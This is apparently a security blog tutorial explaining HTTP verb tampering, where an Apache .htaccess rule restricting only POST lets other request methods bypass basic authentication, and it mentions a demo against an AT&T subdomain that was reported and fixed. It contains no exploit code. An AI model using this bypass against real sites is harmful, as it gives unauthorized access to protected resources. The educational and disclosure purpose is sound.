Saturday, May 20, 2017

AUTHENTICATION BYPASS EXTRABACON SHADOW BROTHERS

HTTP Verb Tampering Demo/Example/Tutorial



What is HTTP Verb?
  •  According to Wiki "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems.  HTTP is the foundation of data communication for the World Wide Web.

  • Verb is nothing but HTTP methods used to indicate the desired action to be performed on the identified resource.


-  List of some basic HTTP Verb or Methods
  • OPTIONS
  • GET
  • HEAD
  • POST 
  • PUT
  • DELETE
  • TRACE
  • CONNECT



What is HTTP Verb Tampering? 

It's a method to bypass a defense technique by tampering the verb. Some secret directories have restricted access by  basic authentication. This directories are protected by the .htaccess file which can be easily exploited. This attack is a result of a Apache  htaccess file misconfiguration .

An administrator, limits the access to the private resource or directory just via POST request method. See the vulnerable code below.














Here AuthUserFile is the directory to the .htpasswd file which contains the username & password in encrypted format.


require valid-user
 


It just limits the POST method & matches the credentials that saved in htpasswd file, if wrong error page shows up.


Here the administrator has limited POST method, but also not blacklisted other methods?. This means any requests via other method would lead the attacker having access to the protected  private resources or directory. Below i have provided a video DEMO of  successful exploitation of an HTTP Verb tampering vulnerability via Live HTTP Headers ( Firefox add-on) on AT&T sub domain (Reported & Fixed). In the next post i will be showing you various ways to fix or apply a patch to this vulnerability . 


HTTP Verb Tampering Demo/Example/Tutorial
Reviewed by Rishal Dwivedion Sep 21 2014
Rating: 5

No comments: